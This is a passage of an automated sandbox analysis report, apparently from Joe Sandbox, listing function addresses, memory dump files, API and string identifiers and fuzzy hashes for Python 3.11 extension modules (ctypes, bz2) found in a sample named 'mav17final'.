                                                  • Instruction ID: cdb02988190d50a224ca1079db819526259d7d25d5cf2cb549970717065ffcf9
                                                  • Opcode Fuzzy Hash: 56d4fabad618d8a5c8e6f1fde8dcb41e7996936431b442245916351dcbdf5c73
                                                  • Instruction Fuzzy Hash: A8212C61A08F8282EA449F6EE8400B92760EF85BE6F186136DF1D873A5DF3CE485C300
                                                  Function 00007FF8B9F6DB58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Arg_FromLongLong_ParseTuple
                                                  • String ID: OO:CopyComPointer
                                                  • API String ID: 1908940310-822416302
                                                  • Opcode ID: a50de67720cd425b58803957e1784c7b340943145018a53cdb6de08dc5e3c1c0
                                                  • Instruction ID: 18f4d6887c94b095f77d5b3bc51ee7d7b102e856c4cfaff675c673e48978d74e
                                                  • Opcode Fuzzy Hash: a50de67720cd425b58803957e1784c7b340943145018a53cdb6de08dc5e3c1c0
                                                  • Instruction Fuzzy Hash: D821F532A08B8685EB558F79DC401B82775AB88BF9F086636DB5D57B98CF3CE045D210
                                                  Function 00007FF8B9F657CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dict_Err_NextString
                                                  • String ID: args not a tuple?$too many initializers
                                                  • API String ID: 1977209248-2791065560
                                                  • Opcode ID: f4fd08385035d02860af40dbb96f0e851c8c10ea306c559d0ae5fa500cb6d0af
                                                  • Instruction ID: 6aabb2aca38c9abeb29e13bb4ec2109c51a446ff96f45be186497c3c31cd3e53
                                                  • Opcode Fuzzy Hash: f4fd08385035d02860af40dbb96f0e851c8c10ea306c559d0ae5fa500cb6d0af
                                                  • Instruction Fuzzy Hash: CC217F61A08BC281EA508F19E4403B967A0FB45BF5F146236EB6D53BE5CF2CD499C700
                                                  Function 00007FF8B9072EE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseErrorHandleLastOpenProcess
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 3453201768-2746090705
                                                  • Opcode ID: 44ebf947db6b65e1c872427e22240e614757305328dfd4b20febe6f3e275686b
                                                  • Instruction ID: dd879f538bfdcb5a8f1a499b2382a62e34ce0883b6b79a7138f326f78a826e75
                                                  • Opcode Fuzzy Hash: 44ebf947db6b65e1c872427e22240e614757305328dfd4b20febe6f3e275686b
                                                  • Instruction Fuzzy Hash: 4F117011F0C6C682EF549F2EE8841799AA1AFA9BE0F444035EB0D47795EE2CE8478700
                                                  Function 00007FF8B90C2354 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_$CheckErr_KeywordsLong_OccurredPositional
                                                  • String ID: BZ2Compressor
                                                  • API String ID: 1699739194-1096114097
                                                  • Opcode ID: 428fb968040cf0367ecb5975a9571f17589fde077a9351a0a9a78da93643c136
                                                  • Instruction ID: 42f66e4202d63bb0111d0f9ce07d6499ef7bcc9e0fc5a9b5f59375a5d98bd822
                                                  • Opcode Fuzzy Hash: 428fb968040cf0367ecb5975a9571f17589fde077a9351a0a9a78da93643c136
                                                  • Instruction Fuzzy Hash: 1D113031B086C286EE209F6DA44017A62B0FF94BD0F544535DB5E87A95DF2CE48E9610
                                                  Function 00007FF8B9F6E008 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_AuditDeallocFromLongLong_ParseSys_Tuple
                                                  • String ID: ctypes.set_errno
                                                  • API String ID: 928689845-1564666054
                                                  • Opcode ID: 59a8a5489d63178a80b732e192b127fc94092e90c4c175c04c3ca01ed042f338
                                                  • Instruction ID: 84ea74b960b6ebb74176d2c9e353d63ac1b74071344a60671312147b7f8e6083
                                                  • Opcode Fuzzy Hash: 59a8a5489d63178a80b732e192b127fc94092e90c4c175c04c3ca01ed042f338
                                                  • Instruction Fuzzy Hash: 97116562F18BC2D2EF548F69E8844B92BA1EF497E2F586035DB4D47350DE2CE595C700
                                                  Function 00007FF8B9F6E0B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_AuditDeallocFromLongLong_ParseSys_Tuple
                                                  • String ID: ctypes.set_last_error
                                                  • API String ID: 928689845-913187751
                                                  • Opcode ID: f23f19bccc13864e0ba767f98ec326220a154fbbf3424597505e894eb8dd0003
                                                  • Instruction ID: f66729374bc23507b7e1c5044efa5754909e02bf4494d41081e2883a5d4ffa51
                                                  • Opcode Fuzzy Hash: f23f19bccc13864e0ba767f98ec326220a154fbbf3424597505e894eb8dd0003
                                                  • Instruction Fuzzy Hash: 61116562F18BC2D2EF548F69E8844B92BA1EF4A7E2F586035DB0D47391DE2CE595C700
                                                  Function 00007FF8B9F6B8B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_FormatSubtypeType_Unicode_strchr
                                                  • String ID: 'out' parameter %d must be a pointer type, not %s$PzZ
                                                  • API String ID: 3500358371-2360062653
                                                  • Opcode ID: fceb702919c06022e64addd7c9aaba2d34447d85d2b2cb0159e7ba4236f850e0
                                                  • Instruction ID: 7fa99d759dd0d06fd4138bc4cdfa4a564c733b1ad73f52bf22848139d1cef3df
                                                  • Opcode Fuzzy Hash: fceb702919c06022e64addd7c9aaba2d34447d85d2b2cb0159e7ba4236f850e0
                                                  • Instruction Fuzzy Hash: 75111921A0CB8791EB509F69E48067827A0EF86BEBF486031DF4D473A5DE6CE844C300
                                                  Function 00007FF8B9F6C174 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_FormatSubtypeType_Unicode_strchr
                                                  • String ID: cast() argument 2 must be a pointer type, not %s$sPzUZXO
                                                  • API String ID: 3500358371-1038790478
                                                  • Opcode ID: 00c494f3386268376c83a7897981a44eeb5e2169e225d7a55c5354403a66d736
                                                  • Instruction ID: 867d0bb9d2a7eeafe09d4cb5e277787cd32380d1b686f2a0417a9a225e4ae458
                                                  • Opcode Fuzzy Hash: 00c494f3386268376c83a7897981a44eeb5e2169e225d7a55c5354403a66d736
                                                  • Instruction Fuzzy Hash: A6110A61A08BC291FA549F5DD8506B827A0AF95FE6F486035CF4D877A5EF2CE884C310
                                                  Function 00007FF8B90C23CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_StringThread_allocate_lockThread_free_lockmemset
                                                  • String ID: Unable to allocate lock$compresslevel must be between 1 and 9
                                                  • API String ID: 681419693-2500606449
                                                  • Opcode ID: 60b2f2588c32191dab62882afd88846cf50051bc512abb92ff4babc415602f46
                                                  • Instruction ID: 85914b0421d80093e926ad86113b1951b2182f474074a45c00085def155c11dd
                                                  • Opcode Fuzzy Hash: 60b2f2588c32191dab62882afd88846cf50051bc512abb92ff4babc415602f46
                                                  • Instruction Fuzzy Hash: 75110A31A18A8692EF009F2DE48037C63B8FF94B98F504135DB1D466A4EF3CE89AC350
                                                  Function 00007FF8B9F64F94 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PyObject_GetAttrString.PYTHON311(?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F64FA8
                                                  • PyDict_New.PYTHON311(?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F64FBC
                                                  • PyErr_NewException.PYTHON311(?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F64FDA
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6504E
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65065
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6507D
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F650A0
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F650C6
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F650EC
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65112
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65138
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6515E
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65181
                                                    • Part of subcall function 00007FF8B9F65028: PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F651A7
                                                    • Part of subcall function 00007FF8B9F65028: PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F651CD
                                                    • Part of subcall function 00007FF8B9F65028: PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F651F3
                                                    • Part of subcall function 00007FF8B9F65028: PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65219
                                                    • Part of subcall function 00007FF8B9F65304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6532F
                                                    • Part of subcall function 00007FF8B9F65304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65366
                                                    • Part of subcall function 00007FF8B9F65304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6538B
                                                    • Part of subcall function 00007FF8B9F65304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F653AA
                                                    • Part of subcall function 00007FF8B9F65304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F653CC
                                                    • Part of subcall function 00007FF8B9F65304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F653EB
                                                    • Part of subcall function 00007FF8B9F65304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6540D
                                                    • Part of subcall function 00007FF8B9F65304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6542C
                                                    • Part of subcall function 00007FF8B9F65304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65451
                                                    • Part of subcall function 00007FF8B9F65304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65470
                                                    • Part of subcall function 00007FF8B9F65304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65495
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Module_ReadyType_$Object$FromLongLong_$Type$AttrDict_Err_ExceptionObject_String
                                                  • String ID: _unpickle$ctypes.ArgumentError
                                                  • API String ID: 4217053054-165408235
                                                  • Opcode ID: 32827969c832a808a66d5017e69f26ea533dafa79bf6c295bc1895e8a6d04efa
                                                  • Instruction ID: cc6a013d884a46fce7c448a51f75d1ba44c0a66fec81e4e5c8ab4a2281887996
                                                  • Opcode Fuzzy Hash: 32827969c832a808a66d5017e69f26ea533dafa79bf6c295bc1895e8a6d04efa
                                                  • Instruction Fuzzy Hash: B9014C30A19F83A2FA509F6DEA801342AA8AF4A7F2F491134CB1C513A1EF3DE054C210
                                                  Function 00007FF8B9F65820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Dict_Err_ItemUnraisableWrite
                                                  • String ID: on calling _ctypes.DictRemover
                                                  • API String ID: 2766432985-2232269487
                                                  • Opcode ID: 256ea331e05c61a4a808f1e36cd886345c9bade03a7633d5d0aea444e30aedf2
                                                  • Instruction ID: dac86fe1d6dbdfdac3826892e910dd672eb4080727f6344bd0e062f57a4cdddc
                                                  • Opcode Fuzzy Hash: 256ea331e05c61a4a808f1e36cd886345c9bade03a7633d5d0aea444e30aedf2
                                                  • Instruction Fuzzy Hash: E001ED62E49A8285FF598F7DD85433C2260EF55BE6F186631CB1E157A0CF2CD565C340
                                                  Function 00007FF8B9F6B368 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FormatFromUnicode_$Dealloc
                                                  • String ID: %s(%R)$<%s object at %p>
                                                  • API String ID: 1714529502-296555854
                                                  • Opcode ID: 7e64ef3b32a657b11c2f44244a8f51ce1e0c9cec8aec46fab4d60a3fe1e5b4e0
                                                  • Instruction ID: da7511c7cce5cc6edcd0f2802d73430aed6815ea78b78dbdcaac48fe1ed736f0
                                                  • Opcode Fuzzy Hash: 7e64ef3b32a657b11c2f44244a8f51ce1e0c9cec8aec46fab4d60a3fe1e5b4e0
                                                  • Instruction Fuzzy Hash: AA010862A09E8281EE049F6AE8800AD6760FF58FE6B086137CF0D07365DE3CE895C300
                                                  Function 00007FF8B9F6C938 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_File_ObjectPrintS_vsnprintfStringSys_Write
                                                  • String ID: stderr
                                                  • API String ID: 1103062482-1769798200
                                                  • Opcode ID: 9a0837009893c9ce3f6b921fad968050c61bacc10e62fde9b4fb5cee5af4f5c7
                                                  • Instruction ID: 8f710989a4fa7053e1afd3fc0c8b436cf643ad359956fef7d52b70ff3eac726e
                                                  • Opcode Fuzzy Hash: 9a0837009893c9ce3f6b921fad968050c61bacc10e62fde9b4fb5cee5af4f5c7
                                                  • Instruction Fuzzy Hash: F9011E22A18FC591EA208F14F8993B97760FF9AB96F580036CB8D43364DF3CE554C640
                                                  Function 00007FF8B9F6F4E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_Format$memcpy
                                                  • String ID: bytes too long (%zd, maximum length %zd)$expected bytes, %s found
                                                  • API String ID: 437140070-1985973764
                                                  • Opcode ID: d9cd41fcd4a9d7115470baacfbcd2da228f5ee59300fb10d52ed7cf167236025
                                                  • Instruction ID: 8cdfb763ead6ca94aa6217b29d432c578025b27f023b2eef63b3dea093897cb4
                                                  • Opcode Fuzzy Hash: d9cd41fcd4a9d7115470baacfbcd2da228f5ee59300fb10d52ed7cf167236025
                                                  • Instruction Fuzzy Hash: 99012CA1E08BC2D5EA409F5DE8902782760AF56BF6F646232CB1D533D4CE2CE889C301
                                                  Function 00007FF8B9841120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Module_$FromInternObjectStateStringUnicode_
                                                  • String ID: close$error
                                                  • API String ID: 4029360594-371397155
                                                  • Opcode ID: d1d56f56bfa3555b9ef12796d8bede51d7c66017a5d4b22be61f28461ee977ed
                                                  • Instruction ID: e0867d4ee9dd6caaf1bfe116473171cbc5a2e4d8abd85aeee47c5a0dad188f2f
                                                  • Opcode Fuzzy Hash: d1d56f56bfa3555b9ef12796d8bede51d7c66017a5d4b22be61f28461ee977ed
                                                  • Instruction Fuzzy Hash: ECF03421B09B8793EA058F6DFA550793360BF09BD4B088237EB2D477A4DE3CE0588300
                                                  Function 00007FF8B9F6D770 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
